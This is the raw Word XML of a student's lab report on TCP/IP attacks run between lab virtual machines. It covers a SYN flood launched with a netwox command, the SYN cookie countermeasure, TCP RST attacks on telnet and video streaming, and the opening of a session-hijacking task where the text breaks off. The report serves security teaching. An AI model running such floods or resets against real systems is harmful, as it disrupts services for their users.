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BC492F" w14:textId="77777777" w:rsidR="00834330" w:rsidRDefault="00834330" w:rsidP="00834330">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Jon Franck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245083C4" w14:textId="1B2A0712" w:rsidR="00834330" w:rsidRDefault="00834330" w:rsidP="00834330">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>3/13/2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDBBB10" w14:textId="77777777" w:rsidR="00834330" w:rsidRDefault="00834330" w:rsidP="00834330">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>CSC 4413</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14343321" w14:textId="7B3007CF" w:rsidR="00834330" w:rsidRDefault="00834330" w:rsidP="00834330">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>TCP/IP Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063F841" w14:textId="77777777" w:rsidR="00834330" w:rsidRDefault="00834330" w:rsidP="00834330">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:t>Learn about the vulnerabilities of the TCP/IP protocols, and exploit them in order to conduct several attacks. Key topics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4753F8" w14:textId="28157A1B" w:rsidR="00834330" w:rsidRDefault="00834330" w:rsidP="00834330">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t>• TCP SYN flood attack, and SYN cookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t>• TCP reset attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t>• TCP session hijacking attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t>• Reverse shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA339A" w14:textId="567784DF" w:rsidR="00834330" w:rsidRDefault="00834330" w:rsidP="00834330">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Task 1</w:t>
      </w:r>
      <w:r w:rsidR="00DE4069">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>SYN Flooding Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2088FF" w14:textId="17C0A835" w:rsidR="00834330" w:rsidRDefault="00834330" w:rsidP="00834330">
      <w:r>
        <w:t xml:space="preserve">Before we can start this attack, we must have </w:t>
      </w:r>
      <w:r w:rsidR="003F31FC">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00F015B4">
        <w:t>hree</w:t>
      </w:r>
      <w:r w:rsidR="003F31FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00196674">
        <w:t>VM’s: the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00F015B4">
        <w:t xml:space="preserve">, the client, </w:t>
      </w:r>
      <w:r w:rsidR="003F31FC">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00196674">
        <w:t xml:space="preserve"> the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA476B" w14:textId="4D26CF35" w:rsidR="00196674" w:rsidRDefault="00196674" w:rsidP="00851433">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673FA81A" wp14:editId="60E50612">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57700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E808F5" w14:textId="3805B07B" w:rsidR="00196674" w:rsidRDefault="00196674" w:rsidP="00834330">
      <w:r>
        <w:t xml:space="preserve">On the server machine we </w:t>
      </w:r>
      <w:r w:rsidR="003F31FC">
        <w:t>run two commands, the first one shows the maximum number of connections that the queue can handled, and the second one checks how many current connections there are. Here there are 128 possible connections, with 0 currently active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D502DE2" w14:textId="77777777" w:rsidR="003F31FC" w:rsidRPr="00834330" w:rsidRDefault="003F31FC" w:rsidP="00834330"/>
    <w:p w14:paraId="5FA2D96B" w14:textId="7FBCBA08" w:rsidR="00256176" w:rsidRDefault="00971AC3" w:rsidP="00834330">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B9B1963" wp14:editId="3D6250A6">
            <wp:extent cx="3093720" cy="1852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27087" cy="1872577"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C714A38" wp14:editId="70276D6A">
            <wp:extent cx="2522220" cy="186575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939" t="14349" r="885" b="6135"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2558405" cy="1892519"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639BAEC" w14:textId="0B3C3407" w:rsidR="00971AC3" w:rsidRDefault="00971AC3" w:rsidP="00834330">
      <w:r>
        <w:t>The screenshots above show that the client VM has connected to the server via telnet</w:t>
      </w:r>
      <w:r w:rsidR="00E06DE7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F23F60" w14:textId="01FA0024" w:rsidR="00971AC3" w:rsidRDefault="00E06DE7" w:rsidP="00834330">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7475A7C5" wp14:editId="2F22149C">
            <wp:extent cx="2958550" cy="2197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5609" cy="2210408"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE4091E" wp14:editId="1FD60849">
            <wp:extent cx="2942882" cy="219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7272" cy="2207844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF3737" w14:textId="385671BB" w:rsidR="002B49CC" w:rsidRDefault="002B49CC" w:rsidP="00834330">
      <w:r>
        <w:t>From the attacking machine, use the netwox command to send a Synflood attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72708A77" w14:textId="0C85160E" w:rsidR="00E06DE7" w:rsidRDefault="002B49CC" w:rsidP="00834330">
      <w:r>
        <w:t>Sudo netwox 76 -i 10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="00E06DE7">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ABD161" w14:textId="089E8688" w:rsidR="00E06DE7" w:rsidRDefault="00E06DE7" w:rsidP="00851433">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="449BB685" wp14:editId="067C8766">
            <wp:extent cx="5943600" cy="3559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9175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="320DD64F" w14:textId="4A467862" w:rsidR="00E06DE7" w:rsidRDefault="00E06DE7" w:rsidP="00834330">
      <w:r>
        <w:t>Because the SYN Flooding attack was successful, the client is no longer able to connect to the server as all of its connections are half-open by SYN requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57391653" w14:textId="77777777" w:rsidR="007E5FEF" w:rsidRDefault="007E5FEF" w:rsidP="00834330">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE4ACC0" w14:textId="4A4261D7" w:rsidR="00F015B4" w:rsidRDefault="00F015B4" w:rsidP="00851433">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="683470B2" wp14:editId="2CFEE921">
            <wp:extent cx="3779520" cy="231675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15" t="3874" r="38077" b="33675"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3787363" cy="2321561"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB0608D" w14:textId="3E48F69F" w:rsidR="007E5FEF" w:rsidRDefault="007E5FEF" w:rsidP="00834330">
      <w:r>
        <w:t>This SYN cookie is a countermeasure that protects against the SYN Flooding attack. The commands above are used to show the current status of the cookie, and activate it (a value of 0 = off, and 1 = on).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A0FE0" w14:textId="5156D0A8" w:rsidR="007E5FEF" w:rsidRDefault="00E06DE7">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B02CD85" wp14:editId="2D3516EA">
            <wp:extent cx="2926080" cy="221206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2892" cy="2232336"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="414B24A0" wp14:editId="597DFCC4">
            <wp:extent cx="2887980" cy="220023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0867" cy="2232909"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F94A0" w14:textId="312E48AE" w:rsidR="00E06DE7" w:rsidRDefault="00E06DE7" w:rsidP="00851433">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63216B1E" wp14:editId="0D452878">
            <wp:extent cx="5943600" cy="3559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9175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A700D1" w14:textId="32FD97EE" w:rsidR="00E06DE7" w:rsidRDefault="00E06DE7">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can see that after enabling the </w:t>
      </w:r>
      <w:r w:rsidR="00754A55">
        <w:t>SYN cookies, the client is now able to telnet to the server VM while it is under attack, meaning the countermeasure was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA478C" w14:textId="6F2B47E8" w:rsidR="00754A55" w:rsidRPr="00754A55" w:rsidRDefault="00754A55">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00754A55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Observations: </w:t>
      </w:r>
      <w:r>
        <w:t>I spent a long time trying to get the VMs to communicate with each other, but I finally figured out that the new VMs I made for this lab are unable to connect to the original one with an IP address of 10.0.2.15, however I am able to get connection to the newest VM (10.0.2.8) from both of the others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D469B41" w14:textId="7BA782B4" w:rsidR="00754A55" w:rsidRDefault="00754A55">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E775FB3" w14:textId="284F5B8C" w:rsidR="007E5FEF" w:rsidRDefault="007E5FEF" w:rsidP="007E5FEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 2 </w:t>
      </w:r>
      <w:r w:rsidR="00DE4069">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="007E5FEF">
        <w:t>TCP RST Attacks on telnet and ssh Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4150738C" w14:textId="77777777" w:rsidR="00754A55" w:rsidRPr="00754A55" w:rsidRDefault="00754A55" w:rsidP="00754A55"/>
    <w:p w14:paraId="668F0FAC" w14:textId="466D93C2" w:rsidR="007E5FEF" w:rsidRDefault="00754A55" w:rsidP="00851433">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B6DAFB" wp14:editId="21973ECB">
            <wp:extent cx="3449515" cy="2065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8731" cy="2071173"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA4168" w14:textId="195A85D0" w:rsidR="00754A55" w:rsidRDefault="00754A55" w:rsidP="007E5FEF">
      <w:r>
        <w:t>First, we establish a telnet connection from the client VM to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF201E2" w14:textId="74DE75C6" w:rsidR="00754A55" w:rsidRDefault="00754A55" w:rsidP="007E5FEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E330BAF" wp14:editId="31BB0E6D">
            <wp:extent cx="2354580" cy="1769708"/>
            <wp:effectExtent l="0" t="0" r="762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5445" cy="1800422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00DE4069">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE4069">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15592D23" wp14:editId="1BA42C1D">
            <wp:extent cx="2927793" cy="17532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8695" cy="1759763"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="737B8B64" w14:textId="536FDDAA" w:rsidR="00754A55" w:rsidRDefault="00754A55" w:rsidP="007E5FEF">
      <w:r>
        <w:t xml:space="preserve">Next, we use the Netwox tool with task number 78 to send a </w:t>
      </w:r>
      <w:r w:rsidR="00DE4069">
        <w:t>TCP RST packet to end the connection. On the client machine, we get a message saying the connection was closed by a foreign host; this means the attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597AE49" w14:textId="4231539A" w:rsidR="00DE4069" w:rsidRDefault="00DE4069" w:rsidP="00DE4069">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 3 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4069">
        <w:t>TCP RST Attacks on Video Streaming Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796106B2" w14:textId="66D0A36D" w:rsidR="00DE4069" w:rsidRDefault="004D5BCF" w:rsidP="00DE4069">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D1A792B" wp14:editId="571BF523">
            <wp:extent cx="2849880" cy="2114270"/>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3155" cy="2183469"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B27B4D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CEAD869" wp14:editId="7B4BA729">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3649806</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1048401</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="796680" cy="33840"/>
                <wp:effectExtent l="76200" t="114300" r="99060" b="118745"/>
                <wp:wrapNone/>
                <wp:docPr id="39" name="Ink 39"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId18">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="796680" cy="33840"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="7751D9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284.6pt;margin-top:76.9pt;width:68.4pt;height:13.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">
                <v:imagedata r:id="rId19" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B27B4D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E58723E" wp14:editId="767A7B10">
            <wp:extent cx="3003851" cy="2226894"/>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2373" cy="2255452"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F20CE" w14:textId="6698338D" w:rsidR="00B27B4D" w:rsidRDefault="00B27B4D" w:rsidP="00DE4069">
      <w:r>
        <w:t>On the client VM, open a video streaming app</w:t>
      </w:r>
      <w:r w:rsidR="004D5BCF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639907F2" w14:textId="38C10387" w:rsidR="004D5BCF" w:rsidRDefault="004D5BCF" w:rsidP="00DE4069">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="509D7022" wp14:editId="7DF0B005">
            <wp:extent cx="3310521" cy="197358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8541" cy="1978361"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A7D8AF6" wp14:editId="1DB4B644">
            <wp:extent cx="2596767" cy="19983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505" cy="2010456"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB12E0E" w14:textId="3F1BDE5B" w:rsidR="004D5BCF" w:rsidRDefault="00D10716" w:rsidP="00DE4069">
      <w:r>
        <w:t>After using the Netwox tool on the attacker’s VM, go back to the video and try to view part of the video that has not been pre-loaded yet. It will appear as if the video is taking a long time to buffer; however, that is the attack causing the TCP connection to be interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C138C" w14:textId="77777777" w:rsidR="00D10716" w:rsidRDefault="00D10716" w:rsidP="00DE4069"/>
    <w:p w14:paraId="12CF7740" w14:textId="054359E2" w:rsidR="004D5BCF" w:rsidRDefault="00D10716" w:rsidP="00D10716">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Task 4 – TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DBE528" w14:textId="0B0C41C0" w:rsidR="00D10716" w:rsidRDefault="00F37BFA" w:rsidP="00D10716">
      <w:r>
        <w:t xml:space="preserve">In this attack we are going to attack an ongoing telnet connection in order </w:t>
      </w:r>
      <w:r w:rsidR="00A84039">
        <w:t>for the attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> send a malicious command </w:t>
      </w:r>
      <w:r w:rsidR="00A84039">
        <w:t>to the server from the clients VM. The goal is to display the contents of a file from the server on the attacker’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B701CD" w14:textId="1C2C5DCC" w:rsidR="00A84039" w:rsidRDefault="0015698F" w:rsidP="00D10716">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="344A532C" wp14:editId="6A05D9D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4587240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1669415</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="350520" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="11430" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="7" name="Oval 7"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3505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4F40D" id="Oval 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:361.2pt;margin-top:131.45pt;width:27.6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" filled="f" strokecolor="red" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A84039">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4593AEB7" wp14:editId="092F8AA9">
            <wp:extent cx="2933700" cy="2217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3188" cy="2232559"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D802617" wp14:editId="21325205">
            <wp:extent cx="2948940" cy="219437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0641" cy="2225406"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1724D6" w14:textId="2C18A28B" w:rsidR="0015698F" w:rsidRDefault="0015698F" w:rsidP="00851433">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507CA4EA" wp14:editId="32D5E313">
            <wp:extent cx="5943600" cy="40906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90670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48206831" w14:textId="66AC9E08" w:rsidR="00302485" w:rsidRDefault="00D34C23" w:rsidP="00D10716">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36AFBFB7" wp14:editId="09002C35">
            <wp:extent cx="2971800" cy="17795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3127" cy="1804336"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6AB361" wp14:editId="18097F77">
            <wp:extent cx="2964180" cy="17750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5397" cy="1997319"/>
